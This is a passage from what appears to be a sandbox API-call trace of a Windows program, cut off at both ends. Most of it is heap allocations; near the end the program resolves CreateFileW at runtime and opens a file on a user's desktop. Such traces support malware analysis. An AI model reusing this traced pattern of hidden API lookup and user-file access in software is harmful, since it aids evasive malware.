Size=0x10) returned 0x43c9d70 [0125.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0125.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0125.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cf8 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0125.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0125.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0125.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0125.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0125.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0125.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0125.505] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0125.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0125.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0125.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0125.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0125.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0125.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0125.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0125.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0125.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.509] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0125.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0125.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0125.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0125.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0125.512] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0125.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0125.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0125.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca850, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0125.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.513] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0125.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0125.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0125.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0125.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0125.514] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\QKxk.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\qkxk.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9128 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 